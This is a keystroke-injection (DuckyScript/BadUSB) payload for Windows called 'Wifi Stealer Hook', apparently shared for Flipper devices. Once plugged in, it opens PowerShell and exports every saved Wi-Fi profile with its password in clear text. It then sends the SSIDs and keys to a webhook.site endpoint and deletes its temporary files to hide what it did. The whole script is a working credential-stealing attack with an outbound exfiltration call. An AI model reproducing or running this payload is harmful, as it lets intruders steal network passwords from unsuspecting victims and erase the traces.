REM Title: Wifi Stealer Hook
REM Author: 7h30th3r0n3
REM Reworked: the0bone
REM Hosted : https://github.com/UberGuidoZ/Flipper/
REM Target:  Windows 7/8/10/11 
REM Supported Layout keyboard: US/FR/DE
REM Version: 1.0
REM Category: Grabber
REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop and send it to webhook
GUI r
DELAY 500
STRING powershell 
ENTER
DELAY 2000
REM setting variabl
STRING $desktop = ([Environment]::GetFolderPath("Desktop"))
ENTER
REM Creating a new folder in Temp with random name to store the xml files and create single text file and send it to webhook (change the https://webhook.site/<webhook-key> part)
STRING New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp/js2k3kd4nne5dhsk"; netsh wlan export profile key=clear; Select-String -Path *.xml -Pattern 'keyMaterial' | % { $_ -replace '</?keyMaterial>', ''} | % {$_ -replace "C:\\Users\\$env:UserName\\Desktop\\", ''} | % {$_ -replace '.xml:22:', ''} > $desktop\0.txt; Set-Location -Path "$env:temp";Invoke-WebRequest -Uri https://webhook.site/<webhook-key> -Method POST -InFile $desktop\0.txt; Remove-Item -Path "$env:tmp/js2k3kd4nne5dhsk" -Force -Recurse;rm $desktop\0.txt;exit
ENTER
